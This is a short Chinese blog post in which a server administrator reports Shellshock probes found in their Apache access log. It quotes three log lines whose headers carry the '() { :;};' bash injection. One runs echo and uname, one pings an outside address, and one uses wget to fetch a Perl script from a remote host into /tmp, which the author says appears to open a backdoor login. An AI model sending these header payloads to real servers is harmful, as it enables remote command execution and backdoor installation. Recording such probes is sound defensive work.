access_log 上已有被 try 的記錄

大部份是 echo XXX 的記錄

54.251.83.67 – – [26/Sep/2014:15:36:34 +0800] “GET / HTTP/1.1” 403 539 “-” “() { :;}; /bin/bash -c \”echo testing9123123\”; /bin/uname -a”

也有是下載 perl 程式,看樣子是可以可以另開通道 login 進到主機,source code 同這個

109.95.210.196 – – [26/Sep/2014:10:50:00 +0800] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.1” 404 1234 “-” “() { :;}; /bin/bash -c \”/usr/bin/wget http://singlesaints.com/firefile/temp?h=rebel-audio.com.tw -O /tmp/a.pl\”

也有 ping

198.20.69.74 – – [26/Sep/2014:07:23:41 +0800] “GET / HTTP/1.1” 200 12801 “() { :; }; /bin/ping -c 1 104.131.0.69” “() { :; }; /bin/ping -c 1 104.131.0.69”

最後修改日期: 2014 年 09 月 27 日

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。